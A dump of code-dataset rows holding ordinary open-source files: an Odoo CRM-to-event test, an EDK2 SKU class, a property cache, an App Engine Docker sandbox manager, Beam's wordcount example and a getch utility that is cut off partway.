Dataset columns (one row per source file; each row renders as
repo_name | path | copies | size | content | license | hash | line_mean | line_max | alpha_frac | autogenerated):

  repo_name      string, length 5 to 92
  path           string, length 4 to 232
  copies         string, 19 distinct values
  size           string, length 4 to 7
  content        string, length 721 to 1.04M
  license        string, 15 distinct values
  hash           int64, -9,223,277,421,539,062,000 to 9,223,102,107B
  line_mean      float64, 6.51 to 99.9
  line_max       int64, 15 to 997
  alpha_frac     float64, 0.25 to 0.97
  autogenerated  bool, 1 distinct value
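Each row below pairs one file's full text (the "content" column) with its repository path and simple quality signals. As a rough, illustrative sketch only (the dataset name, the loader, and the thresholds here are assumptions, not something this dump states), rows with this schema could be filtered on those signals like so:

    from datasets import load_dataset  # assumes a Hugging Face-style dataset

    ds = load_dataset("some-code-dump", split="train")  # hypothetical dataset name
    kept = ds.filter(lambda row: not row["autogenerated"]
                     and row["line_max"] < 1000
                     and 0.25 <= row["alpha_frac"] <= 0.97)
    print(len(kept), "rows kept")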
open-synergy/event | crm_lead_to_event_registration/tests/test_crm_lead_to_event_registration.py | 1 | 1837 | # -*- coding: utf-8 -*-
# © 2016 Pedro M. Baeza <pedro.baeza@tecnativa.com>
# License AGPL-3 - See http://www.gnu.org/licenses/agpl-3.0.html
from openerp import fields
from openerp.tests import common
class TestCrmLeadToEventRegistration(common.TransactionCase):
def setUp(self):
super(TestCrmLeadToEventRegistration, self).setUp()
self.lead = self.env['crm.lead'].create({
'name': 'Test lead',
'partner_name': 'Test',
})
self.event = self.env['event.event'].create(
{'name': 'Test event',
'date_begin': fields.Date.today(),
'date_end': fields.Date.today()})
self.partner = self.env['res.partner'].create({'name': 'Test partner'})
self.registration = self.env['event.registration'].create(
{'event_id': self.event.id,
'partner_id': self.partner.id})
self.wiz_obj = self.env['crm.lead2opportunity.partner'].with_context(
active_ids=[self.lead.id], active_id=self.lead.id,
active_model='crm.lead')
def test_convert_lead_wo_partner(self):
wizard = self.wiz_obj.create({
'event_id': self.event.id,
'name': 'convert',
'action': 'create',
})
wizard.action_apply()
self.assertTrue(self.event.registration_ids)
self.assertTrue(self.event.registration_ids[0].partner_id)
def test_convert_lead_with_partner(self):
wizard = self.wiz_obj.create({
'event_id': self.event.id,
'name': 'convert',
'action': 'exist',
'partner_id': self.partner.id,
})
wizard.action_apply()
self.assertTrue(self.event.registration_ids)
self.assertEqual(
self.event.registration_ids[0].partner_id, self.partner)
| agpl-3.0 | 3,998,139,696,512,973,300 | 37.25 | 79 | 0.585512 | false |
google/google-ctf | third_party/edk2/BaseTools/Source/Python/CommonDataClass/CommonClass.py | 1 | 4241 | ## @file
# This file is used to define common items of class object
#
# Copyright (c) 2007 - 2018, Intel Corporation. All rights reserved.<BR>
# This program and the accompanying materials
# are licensed and made available under the terms and conditions of the BSD License
# which accompanies this distribution. The full text of the license may be found at
# http://opensource.org/licenses/bsd-license.php
#
# THE PROGRAM IS DISTRIBUTED UNDER THE BSD LICENSE ON AN "AS IS" BASIS,
# WITHOUT WARRANTIES OR REPRESENTATIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED.
## SkuInfoClass
#
# This class defines the SkuInfo item used in Module/Platform/Package files
#
# @param object: Inherited from object class
# @param SkuIdName: Input value for SkuIdName, default is ''
# @param SkuId: Input value for SkuId, default is ''
# @param VariableName: Input value for VariableName, default is ''
# @param VariableGuid: Input value for VariableGuid, default is ''
# @param VariableOffset: Input value for VariableOffset, default is ''
# @param HiiDefaultValue: Input value for HiiDefaultValue, default is ''
# @param VpdOffset: Input value for VpdOffset, default is ''
# @param DefaultValue: Input value for DefaultValue, default is ''
#
# @var SkuIdName: To store value for SkuIdName
# @var SkuId: To store value for SkuId
# @var VariableName: To store value for VariableName
# @var VariableGuid: To store value for VariableGuid
# @var VariableOffset: To store value for VariableOffset
# @var HiiDefaultValue: To store value for HiiDefaultValue
# @var VpdOffset: To store value for VpdOffset
# @var DefaultValue: To store value for DefaultValue
#
class SkuInfoClass(object):
def __init__(self, SkuIdName = '', SkuId = '', VariableName = '', VariableGuid = '', VariableOffset = '',
HiiDefaultValue = '', VpdOffset = '', DefaultValue = '', VariableGuidValue = '', VariableAttribute = '', DefaultStore = None):
self.SkuIdName = SkuIdName
self.SkuId = SkuId
#
# Used by Hii
#
if DefaultStore is None:
DefaultStore = {}
self.VariableName = VariableName
self.VariableGuid = VariableGuid
self.VariableGuidValue = VariableGuidValue
self.VariableOffset = VariableOffset
self.HiiDefaultValue = HiiDefaultValue
self.VariableAttribute = VariableAttribute
self.DefaultStoreDict = DefaultStore
#
# Used by Vpd
#
self.VpdOffset = VpdOffset
#
# Used by Default
#
self.DefaultValue = DefaultValue
## Convert the class to a string
#
# Convert each member of the class to string
# Organize to a single line format string
#
# @retval Rtn Formatted String
#
def __str__(self):
Rtn = 'SkuId = ' + str(self.SkuId) + "," + \
'SkuIdName = ' + str(self.SkuIdName) + "," + \
'VariableName = ' + str(self.VariableName) + "," + \
'VariableGuid = ' + str(self.VariableGuid) + "," + \
'VariableOffset = ' + str(self.VariableOffset) + "," + \
'HiiDefaultValue = ' + str(self.HiiDefaultValue) + "," + \
'VpdOffset = ' + str(self.VpdOffset) + "," + \
'DefaultValue = ' + str(self.DefaultValue) + ","
return Rtn
def __deepcopy__(self,memo):
new_sku = SkuInfoClass()
new_sku.SkuIdName = self.SkuIdName
new_sku.SkuId = self.SkuId
new_sku.VariableName = self.VariableName
new_sku.VariableGuid = self.VariableGuid
new_sku.VariableGuidValue = self.VariableGuidValue
new_sku.VariableOffset = self.VariableOffset
new_sku.HiiDefaultValue = self.HiiDefaultValue
new_sku.VariableAttribute = self.VariableAttribute
new_sku.DefaultStoreDict = {key:value for key,value in self.DefaultStoreDict.items()}
new_sku.VpdOffset = self.VpdOffset
new_sku.DefaultValue = self.DefaultValue
return new_sku
| apache-2.0 | -8,464,301,721,770,162,000 | 41.721649 | 143 | 0.620844 | false |
VHAINNOVATIONS/DmD | scrubber/MIST_2_0_4/src/MAT/lib/mat/python/MAT/PropertyCache.py | 1 | 6712 | # Copyright (C) 2007 - 2009 The MITRE Corporation. See the toplevel
# file LICENSE for license terms.
# This is a file-based property cache which I was originally using in
# the experiment engine, but now also in the workspaces.
#
# A property cache
#
# attrTriples is a sequence of triples <attr>, <readFunction>, <writeFunction>
# The read and write functions take the object and the value, and return
# a string (for writing) or an object (for reading). If they're null,
# the literal value is used.
# 11/4/2009: updated the backing store to the ConfigParser module. This
# allows me to have a GLOBALS section, and then subsections for, e.g.,
# MAT engine argument settings.
# So the syntax now permits the value to be a dictionary OF STRINGS,
# in which case
# the attribute is a section name. This can't happen recursively.
# Otherwise, the section name is "GLOBALS". And, the keys will be
# case-insensitive. So in the dictionary children, we have to
# store a couple things, like the actual field name and whether it's
# boolean or not.
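# Illustrative round trip (not part of the original module; the class name,
# attribute names and file path below are placeholders):
#
#     class Holder(object):
#         pass
#
#     h = Holder()
#     h.title = "run1"                  # plain value -> [_GLOBALS] section
#     h.settings = {"iterations": "5"}  # dict value  -> its own [settings] section
#     cache = PropertyCache(h, "/tmp/props.cfg",
#                           ("title", None, None),
#                           ("settings", None, None))
#     cache.save()                      # writes the .cfg backing file
#     cache.load()                      # restores the values onto h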
from ConfigParser import RawConfigParser, MissingSectionHeaderError
class PropertyCache:
def __init__(self, obj, file, *attrTriples):
self.obj = obj
self.file = file
self.attrTriples = []
self.attrDict = {}
if attrTriples:
self.addAttrTriples(attrTriples)
def addAttrTriples(self, attrTriples):
self.attrTriples += attrTriples
self.attrDict.update(dict([(a[0].lower(), (a[0], a[1], a[2])) for a in attrTriples]))
def save(self):
obj = self.obj
p = RawConfigParser()
p.add_section("_GLOBALS")
for attr, readF, writeF in self.attrTriples:
writeObj = None
if hasattr(obj, attr):
v = getattr(obj, attr)
if v is not None:
if writeF is not None:
writeObj = writeF(obj, v)
elif type(v) is dict:
writeObj = v
else:
writeObj = str(v)
elif writeF is not None:
writeObj = writeF(obj, None)
if writeObj is not None:
if type(writeObj) is dict:
addedSection = False
for k, v in writeObj.items():
if v is None:
continue
if not addedSection:
p.add_section(attr)
p.add_section("_METADATA " + attr)
addedSection = True
# Let's record the type. Let's allow
# strings, booleans, ints, floats.
# For backward compatibility, "no"
# means string, "yes" means boolean
# when we read.
if type(v) in (bool, str, int, float):
tString = type(v).__name__
v = str(v)
else:
raise TypeError, "dictionary value must be ASCII string, float, boolean or integer"
p.set(attr, k, v)
p.set("_METADATA " + attr, k, tString + " " + k)
else:
p.set("_GLOBALS", attr, writeObj)
fp = open(self.file, "w")
p.write(fp)
fp.close()
def load(self):
obj = self.obj
p = RawConfigParser()
try:
p.read([self.file])
except MissingSectionHeaderError:
# Oops, probably the old file format.
self._loadv1()
return
lvPairs = []
metadata = {}
dictDigesters = {"str": lambda x: x,
"no": lambda x: x,
"int": int,
"float": float,
"yes": lambda x: x == "True",
"bool": lambda x: x == "True"}
for sect in p.sections():
opts = p.options(sect)
if sect == "_GLOBALS":
for lab in opts:
val = p.get(sect, lab)
lvPairs.append((lab, val))
elif sect.startswith("_METADATA "):
attrName = sect[10:]
localMdata = {}
for lab in opts:
val = p.get(sect, lab)
# Let's record the type. Let's allow
# strings, booleans, ints, floats.
# For backward compatibility, "no"
# means string, "yes" means boolean
# when we read.
toks = val.split(None, 1)
if len(toks) == 2:
localMdata[lab] = (dictDigesters[toks[0]], toks[1])
metadata[attrName] = localMdata
else:
# Construct a dictionary.
d = {}
for lab in opts:
d[lab] = p.get(sect, lab)
lvPairs.append((sect, d))
for lab, val in lvPairs:
if metadata.has_key(lab):
for k, (digester, trueK) in metadata[lab].items():
v = val[k]
del val[k]
val[trueK] = digester(v)
if self.attrDict.has_key(lab):
attrName, readF, writeF = self.attrDict[lab]
if readF is not None:
readObj = readF(obj, val)
else:
readObj = val
if readObj is not None:
setattr(obj, attrName, readObj)
# For the 1.0 property cache file format.
# First, we have to turn the dictionary into something
# useful. The 1.0 version didn't have to worry about
# the case insensitivity issue.
def _loadv1(self):
obj = self.obj
attrDict = dict([(attrName, (readF, writeF)) for attrName, readF, writeF
in self.attrDict.values()])
fp = open(self.file, "r")
for line in fp.readlines():
toks = line.strip().split(" : ", 1)
if len(toks) == 2:
[lab, val] = toks
if attrDict.has_key(lab):
readF, writeF = attrDict[lab]
if readF is not None:
readObj = readF(obj, val)
else:
readObj = val
if readObj is not None:
setattr(obj, lab, readObj)
fp.close()
| apache-2.0 | 586,704,132,469,674,100 | 38.482353 | 111 | 0.476162 | false |
ajessup/appstart | appstart/sandbox/container_sandbox.py | 1 | 23266 | # Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A ContainerSandbox manages the application and devappserver containers.
This includes their creation, termination, and destruction.
ContainerSandbox is intended to be used inside a "with" statement. Inside
the interior of the "with" statement, the user interacts with the containers
via the docker api. It may also be beneficial for the user to perform
system tests in this manner.
"""
# This file conforms to the external style guide
# pylint: disable=bad-indentation, g-bad-import-order
import io
import os
import sys
import time
import docker
import configuration
import container
from .. import utils
from .. import constants
from ..utils import get_logger
# Maximum attempts to health check application container.
MAX_ATTEMPTS = 30
# Default port that the application is expected to listen on inside
# the application container.
DEFAULT_APPLICATION_PORT = 8080
# Time format for naming images/containers
TIME_FMT = '%Y.%m.%d_%H.%M.%S'
# Java offset for the xml file's location, relative to the root
# directory of the WAR archive
JAVA_OFFSET = 'WEB-INF/'
class ContainerSandbox(object):
"""Sandbox to manage the user application & devappserver containers.
This sandbox aims to leave the docker container space untouched.
Proper usage ensures that application & devappserver containers will
be created, started, stopped, and destroyed. For proper usage, the
ContainerSandbox should be used as a context manager (inside a "with"
statement), or the start and stop functions should be invoked from
within a try-finally context.
"""
# pylint: disable=too-many-instance-attributes
# pylint: disable=too-many-arguments
def __init__(self,
config_file=None,
image_name=None,
application_id=None,
application_port=8080,
admin_port=8000,
clear_datastore=False,
internal_admin_port=32768,
internal_api_port=32769,
internal_proxy_port=32770,
log_path=None,
run_api_server=True,
storage_path='/tmp/app_engine/storage',
nocache=False,
timeout=MAX_ATTEMPTS,
force_version=False):
"""Get the sandbox ready to construct and run the containers.
Args:
config_file: (basestring or None) The relative or full path
to the config_file of the application. At least one of
image_name and config_file must be specified. If image_name is
not specified, this path will be used to help find the
Dockerfile and build the application container.
Therefore, if image_name is not specified, there should
be a Dockerfile in the correct location:
Non-java apps (apps that use .yaml files)
1) The .yaml file must be in the root of the app
directory.
2) The Dockerfile must be in the root of the app
directory.
Java apps (apps that are built off java-compat):
1) The appengine-web.xml file must be in
<root>/WEB-INF/ (where <root> is the root
directory of the WAR archive.)
2) The Dockerfile must be in the root of the WAR
archive.
3) There must be a web.xml file in the same
directory as the appengine-web.xml file.
image_name: (basestring or None) If specified, the sandbox
will run the image associated with image_name instead of
building an image from the specified application_directory.
application_id: (basestring) The application ID is
the unique "appengine application ID" that the app is
identified by, and can be found in the developer's
console. While for deployment purposes, this ID is
important, it's not as important in development. This
ID only controls which datastore, blobstore, etc the
sandbox will use. If the sandbox is run consecutively
with the same application_id, (and of course, the same
storage_path) the datastore, blobstore, taskqueue, etc
will persist assuming their data has not been deleted.
application_port: (int) The port on the docker host that should be
mapped to the application. The application will be
accessible through this port.
admin_port: (int) The port on the docker server host that
should be mapped to the admin server, which runs inside
the devappserver container. The admin panel will be
accessible through this port.
clear_datastore: (bool) Whether or not to clear the datastore.
If True, this eliminates all of the data from the datastore
before running the api server.
internal_admin_port: (int) The port INSIDE the devappserver
container that the admin panel binds to. Because this
is internal to the container, it can be defaulted.
In fact, you shouldn't change it from the default unless
you have a reason to.
internal_api_port: (int) The port INSIDE the devappserver
container that the api server should bind to.
~Same disclaimer as the one for internal_admin_port.~
internal_proxy_port: (int) The port INSIDE the devappserver
container that the proxy should bind to.
~Same disclaimer as the one for internal_admin_port.~
log_path: (basestring or None) The path where the application's
logs should be collected. Note that the application's logs
will be collected EXTERNALLY (ie they will collect in the
docker host's file system) and log_path specifies where
these logs should go. If log_path is None, a timestamped
name will be generated for the log directory.
run_api_server: (bool) Whether or not to run the api server.
If this argument is set to false, the sandbox won't start
a devappserver.
storage_path: (basestring) The path (external to the
containers) where the data associated with the api
server's services - datastore, blobstore, etc - should
collect. Note that this path defaults to
/tmp/appengine/storage, so it should be changed if the data
is intended to persist.
nocache: (bool) Whether or not to use the cache when building
images.
timeout: (int) How many seconds to wait for the application
container to start.
force_version: (bool) Whether or not to continue in the case
of mismatched docker versions.
"""
self.cur_time = time.strftime(TIME_FMT)
self.app_id = (application_id or
time.strftime('%s'))
self.internal_api_port = internal_api_port
self.internal_proxy_port = internal_proxy_port
self.internal_admin_port = internal_admin_port
self.clear_datastore = clear_datastore
self.port = application_port
self.storage_path = storage_path
self.log_path = (
log_path or self.make_timestamped_name(
'/tmp/log/app_engine/app_logs',
self.cur_time))
self.image_name = image_name
self.admin_port = admin_port
self.dclient = utils.get_docker_client()
self.devappserver_container = None
self.app_container = None
self.pinger_container = None
self.nocache = nocache
self.run_devappserver = run_api_server
self.timeout = timeout
if config_file:
self.conf_path = os.path.abspath(config_file)
else:
if not image_name:
raise utils.AppstartAbort('At least one of config_file and '
'image_name must be specified.')
self.conf_path = os.path.join(os.path.dirname(__file__),
'app.yaml')
self.application_configuration = (
configuration.ApplicationConfiguration(self.conf_path))
self.app_dir = self.app_directory_from_config(self.conf_path)
# For Java apps, the xml file must be offset by WEB-INF.
# Otherwise, devappserver will think that it's a non-java app.
self.das_offset = (JAVA_OFFSET if
self.application_configuration.is_java else '')
if not force_version:
utils.check_docker_version(self.dclient)
def __enter__(self):
self.start()
return self
def start(self):
"""Start the sandbox."""
try:
self.create_and_run_containers()
except: # pylint: disable=bare-except
self.stop()
raise
def create_and_run_containers(self):
"""Creates and runs app and (optionally) devappserver containers.
This includes the creation of a new devappserver image, unless
self.run_devappserver is False. If image_name isn't specified, an
image is created for the application as well. Newly made containers
are cleaned up, but newly made images are not.
"""
if self.run_devappserver:
# Devappserver must know APP_ID to properly interface with
# services like datastore, blobstore, etc. It also needs
# to know where to find the config file, which port to
# run the proxy on, and which port to run the api server on.
das_env = {'APP_ID': self.app_id,
'CLEAR_DATASTORE': self.clear_datastore,
'PROXY_PORT': self.internal_proxy_port,
'API_PORT': self.internal_api_port,
'ADMIN_PORT': self.internal_admin_port,
'CONFIG_FILE': os.path.join(
self.das_offset,
os.path.basename(self.conf_path))}
devappserver_image = self.build_devappserver_image()
devappserver_container_name = (
self.make_timestamped_name('devappserver',
self.cur_time))
# The host_config specifies port bindings and volume bindings.
# /storage is bound to the storage_path. Internally, the
# devappserver writes all the db files to /storage. The mapping
# thus allows these files to appear on the host machine. As for
# port mappings, we only want to expose the application (via the
# proxy), and the admin panel.
devappserver_hconf = docker.utils.create_host_config(
port_bindings={
DEFAULT_APPLICATION_PORT: self.port,
self.internal_admin_port: self.admin_port,
},
binds={
self.storage_path: {'bind': '/storage'},
}
)
self.devappserver_container = container.Container(self.dclient)
self.devappserver_container.create(
name=devappserver_container_name,
image=devappserver_image,
ports=[DEFAULT_APPLICATION_PORT, self.internal_admin_port],
volumes=['/storage'],
host_config=devappserver_hconf,
environment=das_env)
self.devappserver_container.start()
get_logger().info('Starting container: %s',
devappserver_container_name)
# The application container needs several environment variables
# in order to start up the application properly, as well as
# look for the api server in the correct place. Notes:
#
# GAE_PARTITION is always dev for development modules.
# GAE_LONG_APP_ID is the "application ID". When devappserver
# is invoked, it can be passed a "--application" flag. This
# application must be consistent with GAE_LONG_APP_ID.
# API_HOST is 0.0.0.0 because application container runs on the
# same network stack as devappserver.
# MODULE_YAML_PATH specifies the path to the app from the
# app directory
# TODO (find in g3 and link to here via comment)
app_env = {'API_HOST': '0.0.0.0',
'API_PORT': self.internal_api_port,
'GAE_LONG_APP_ID': self.app_id,
'GAE_PARTITION': 'dev',
'GAE_MODULE_INSTANCE': '0',
'MODULE_YAML_PATH': os.path.basename(self.conf_path),
'GAE_MODULE_NAME': 'default', # TODO(gouzenko) parse app.yaml
'GAE_MODULE_VERSION': '1',
'GAE_SERVER_PORT': '8080',
'USE_MVM_AGENT': 'true'}
# Build from the application directory iff image_name is not
# specified.
app_image = self.image_name or self.build_app_image()
app_container_name = self.make_timestamped_name('test_app',
self.cur_time)
# If devappserver is running, hook up the app to it.
if self.run_devappserver:
network_mode = ('container:%s' %
self.devappserver_container.get_id())
ports = port_bindings = None
else:
port_bindings = {DEFAULT_APPLICATION_PORT: self.port}
ports = [DEFAULT_APPLICATION_PORT]
network_mode = None
app_hconf = docker.utils.create_host_config(
port_bindings=port_bindings,
binds={
self.log_path: {'bind': '/var/log/app_engine'}
},
)
self.app_container = container.ApplicationContainer(
self.application_configuration,
self.dclient)
self.app_container.create(
name=app_container_name,
image=app_image,
ports=ports,
volumes=['/var/log/app_engine'],
host_config=app_hconf,
environment=app_env)
# Start as a shared network container, putting the application
# on devappserver's network stack. (If devappserver is not
# running, network_mode is None).
try:
self.app_container.start(network_mode=network_mode)
except utils.AppstartAbort:
if self.run_devappserver:
self.abort_if_not_running(self.devappserver_container)
raise
# Construct a pinger container and bind it to the application's network
# stack. This will allow the pinger to attempt to connect to the
# application's ports.
pinger_name = self.make_timestamped_name('pinger', self.cur_time)
self.pinger_container = container.PingerContainer(self.dclient)
try:
self.pinger_container.create(name=pinger_name,
image=constants.PINGER_IMAGE)
except utils.AppstartAbort:
if not utils.find_image(constants.PINGER_IMAGE):
raise utils.AppstartAbort('No pinger image found. '
'Did you forget to run "appstart '
'init"? ')
raise
try:
self.pinger_container.start(
network_mode='container:{}'.format(self.app_container.get_id()))
except utils.AppstartAbort:
self.abort_if_not_running(self.app_container)
raise
self.wait_for_start()
self.app_container.stream_logs()
def stop(self):
"""Remove containers to clean up the environment."""
self.stop_and_remove_containers()
@staticmethod
def abort_if_not_running(cont):
if not cont.running():
cont.stream_logs(stream=False)
raise utils.AppstartAbort('{0} stopped '
'prematurely'.format(cont.name))
def __exit__(self, etype, value, traceback):
self.stop()
def stop_and_remove_containers(self):
"""Stop and remove application containers."""
containers_to_remove = [self.app_container,
self.devappserver_container,
self.pinger_container]
for cont in containers_to_remove:
if cont and cont.running():
cont_id = cont.get_id()
get_logger().info('Stopping %s', cont_id)
cont.kill()
get_logger().info('Removing %s', cont_id)
cont.remove()
def wait_for_start(self):
"""Wait for the app container to start.
Raises:
utils.AppstartAbort: If the application server doesn't
start after timeout reach it on 8080.
"""
host = self.app_container.host
get_logger().info('Waiting for application to listen on port 8080')
attempt = 1
graphical = sys.stdout.isatty()
def print_if_graphical(message):
if graphical:
sys.stdout.write(message)
sys.stdout.flush()
def exit_loop_with_error(error):
print_if_graphical('\n')
raise utils.AppstartAbort(error)
print_if_graphical('Waiting ')
while True:
if attempt > self.timeout:
exit_loop_with_error('The application server timed out.')
if self.run_devappserver:
self.abort_if_not_running(self.devappserver_container)
self.abort_if_not_running(self.app_container)
if attempt % 4 == 0:
# \033[3D moves the cursor left 3 times. \033[K clears to the
# end of the line. So, every 4th ping, clear the dots.
print_if_graphical('\033[3D\033[K')
else:
print_if_graphical('.')
if self.pinger_container.ping_application_container():
print_if_graphical('\n')
break
attempt += 1
time.sleep(1)
get_logger().info('Your application is live. '
'Access it at: {0}:{1}'.format(host, str(self.port)))
@staticmethod
def app_directory_from_config(full_config_file_path):
"""Get the application root directory based on the config file.
Args:
full_config_file_path: (basestring) The absolute path to a
config file.
Returns:
(basestring): The application's root directory.
"""
conf_file_dir = os.path.dirname(full_config_file_path)
if full_config_file_path.endswith('.yaml'):
return conf_file_dir
else:
return os.path.dirname(conf_file_dir)
def build_app_image(self):
"""Build the app image from the Dockerfile in the root directory.
Returns:
(basestring) The name of the new app image.
"""
name = self.make_timestamped_name('app_image', self.cur_time)
utils.build_from_directory(self.app_dir, name)
return name
def build_devappserver_image(self):
"""Build a layer over devappserver to include application files.
The new image contains the user's config files.
Returns:
(basestring) The name of the new devappserver image.
"""
# Collect the files that should be added to the docker build
# context.
files_to_add = {self.conf_path: None}
if self.application_configuration.is_java:
files_to_add[self.get_web_xml(self.conf_path)] = None
# The Dockerfile should add the config files to
# the /app folder in devappserver's container.
dockerfile = """
FROM %(das_repo)s
ADD %(path)s/* %(dest)s
""" %{'das_repo': constants.DEVAPPSERVER_IMAGE,
'path': os.path.dirname(self.conf_path),
'dest': os.path.join('/app', self.das_offset)}
# Construct a file-like object from the Dockerfile.
dockerfile_obj = io.BytesIO(dockerfile.encode('utf-8'))
build_context = utils.make_tar_build_context(dockerfile_obj,
files_to_add)
image_name = self.make_timestamped_name('devappserver_image',
self.cur_time)
# Build the devappserver image.
res = self.dclient.build(fileobj=build_context,
custom_context=True,
rm=True,
nocache=self.nocache,
tag=image_name)
# Log the output of the build.
try:
utils.log_and_check_build_results(res, image_name)
except utils.AppstartAbort:
if not utils.find_image(constants.DEVAPPSERVER_IMAGE):
raise utils.AppstartAbort('No devappserver base image found. '
'Did you forget to run "appstart '
'init"?')
raise
return image_name
@staticmethod
def get_web_xml(full_config_file_path):
"""Get (what should be) the path of the web.xml file.
Args:
full_config_file_path: (basestring) The absolute path to a
.xml config file.
Returns:
(basestring) The full path to the web.xml file.
"""
return os.path.join(os.path.dirname(full_config_file_path),
'web.xml')
@staticmethod
def make_timestamped_name(base, time_str):
"""Construct a name for an image or container.
Note that naming is functionally unimportant and
serves only to make the output of 'docker images'
and 'docker ps' look cleaner.
Args:
base: (basestring) The prefix of the name.
time_str: (basestring) The name's timestamp.
Returns:
(basestring) The name of the image or container.
"""
return '%s.%s' % (base, time_str)
| apache-2.0 | 8,048,079,043,332,018,000 | 41.072333 | 81 | 0.57887 | false |
RyanSkraba/beam | sdks/python/apache_beam/examples/wordcount.py | 1 | 5161 | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""A word-counting workflow."""
from __future__ import absolute_import
import argparse
import logging
import re
from past.builtins import unicode
import apache_beam as beam
from apache_beam.io import ReadFromText
from apache_beam.io import WriteToText
from apache_beam.metrics import Metrics
from apache_beam.metrics.metric import MetricsFilter
from apache_beam.options.pipeline_options import PipelineOptions
from apache_beam.options.pipeline_options import SetupOptions
class WordExtractingDoFn(beam.DoFn):
"""Parse each line of input text into words."""
def __init__(self):
# TODO(BEAM-6158): Revert the workaround once we can pickle super() on py3.
# super(WordExtractingDoFn, self).__init__()
beam.DoFn.__init__(self)
self.words_counter = Metrics.counter(self.__class__, 'words')
self.word_lengths_counter = Metrics.counter(self.__class__, 'word_lengths')
self.word_lengths_dist = Metrics.distribution(
self.__class__, 'word_len_dist')
self.empty_line_counter = Metrics.counter(self.__class__, 'empty_lines')
def process(self, element):
"""Returns an iterator over the words of this element.
The element is a line of text. If the line is blank, note that, too.
Args:
element: the element being processed
Returns:
The processed element.
"""
text_line = element.strip()
if not text_line:
self.empty_line_counter.inc(1)
words = re.findall(r'[\w\']+', text_line, re.UNICODE)
for w in words:
self.words_counter.inc()
self.word_lengths_counter.inc(len(w))
self.word_lengths_dist.update(len(w))
return words
def run(argv=None, save_main_session=True):
"""Main entry point; defines and runs the wordcount pipeline."""
parser = argparse.ArgumentParser()
parser.add_argument('--input',
dest='input',
default='gs://dataflow-samples/shakespeare/kinglear.txt',
help='Input file to process.')
parser.add_argument('--output',
dest='output',
required=True,
help='Output file to write results to.')
known_args, pipeline_args = parser.parse_known_args(argv)
# We use the save_main_session option because one or more DoFn's in this
# workflow rely on global context (e.g., a module imported at module level).
pipeline_options = PipelineOptions(pipeline_args)
pipeline_options.view_as(SetupOptions).save_main_session = save_main_session
p = beam.Pipeline(options=pipeline_options)
# Read the text file[pattern] into a PCollection.
lines = p | 'read' >> ReadFromText(known_args.input)
# Count the occurrences of each word.
def count_ones(word_ones):
(word, ones) = word_ones
return (word, sum(ones))
counts = (lines
| 'split' >> (beam.ParDo(WordExtractingDoFn())
.with_output_types(unicode))
| 'pair_with_one' >> beam.Map(lambda x: (x, 1))
| 'group' >> beam.GroupByKey()
| 'count' >> beam.Map(count_ones))
# Format the counts into a PCollection of strings.
def format_result(word_count):
(word, count) = word_count
return '%s: %d' % (word, count)
output = counts | 'format' >> beam.Map(format_result)
# Write the output using a "Write" transform that has side effects.
# pylint: disable=expression-not-assigned
output | 'write' >> WriteToText(known_args.output)
result = p.run()
result.wait_until_finish()
# Do not query metrics when creating a template which doesn't run
if (not hasattr(result, 'has_job') # direct runner
or result.has_job): # not just a template creation
empty_lines_filter = MetricsFilter().with_name('empty_lines')
query_result = result.metrics().query(empty_lines_filter)
if query_result['counters']:
empty_lines_counter = query_result['counters'][0]
logging.info('number of empty lines: %d', empty_lines_counter.result)
word_lengths_filter = MetricsFilter().with_name('word_len_dist')
query_result = result.metrics().query(word_lengths_filter)
if query_result['distributions']:
word_lengths_dist = query_result['distributions'][0]
logging.info('average word length: %d', word_lengths_dist.result.mean)
if __name__ == '__main__':
logging.getLogger().setLevel(logging.INFO)
run()
| apache-2.0 | 626,437,405,938,748,800 | 36.398551 | 79 | 0.679132 | false |
Spacecraft-Code/SPELL | src/spell/spell/utils/getch.py | 1 | 3563 | ###################################################################################
## MODULE : spell.utils.getch
## DATE : Mar 18, 2011
## PROJECT : SPELL
## DESCRIPTION: Getchar implementation
## --------------------------------------------------------------------------------
##
## Copyright (C) 2008, 2015 SES ENGINEERING, Luxembourg S.A.R.L.
##
## This file is part of SPELL.
##
## This component is free software: you can redistribute it and/or modify
## it under the terms of the GNU General Public License as published by
## the Free Software Foundation, either version 3 of the License, or
## (at your option) any later version.
##
## This software is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with SPELL. If not, see <http://www.gnu.org/licenses/>.
##
###################################################################################
import sys
UP = '-up-'
DOWN = '-down-'
LEFT = '-left-'
RIGHT = '-right-'
ESC = '-esc-'
ENTER = '-enter-'
TAB = '-tab-'
################################################################################
class _Getch:
"""
Gets a single character from standard input. Does not echo to the
screen.
"""
def __init__(self):
try:
self.impl = _GetchWindows()
except ImportError:
self.impl = _GetchUnix()
def __call__(self): return self.impl()
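# Illustrative use of the module-level `getch` instance created at the bottom
# of this file (not part of the original module):
#
#     key = getch()            # blocks for one keypress and echoes it
#     if key in (UP, DOWN, LEFT, RIGHT):
#         pass                 # arrow keys come back as these markers
#     elif key == ENTER:
#         pass                 # carriage return / newline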
################################################################################
class _GetchCommon:
scanCode = False
def echo(self, ch):
o = ord(ch)
if self.scanCode:
if o==75:
result = LEFT
elif o==77:
result = RIGHT
elif o==72:
result = UP
elif o==80:
result = DOWN
else:
result = ch
else:
if o==13 or o==10:
sys.stdout.write('\n')
result = ENTER
elif o==9:
sys.stdout.write('\t')
result = TAB
elif o==27:
result = ESC
else:
sys.stdout.write(ch)
result = ch
self.scanCode = False
return result
################################################################################
class _GetchUnix(_GetchCommon):
def __init__(self):
import tty, sys
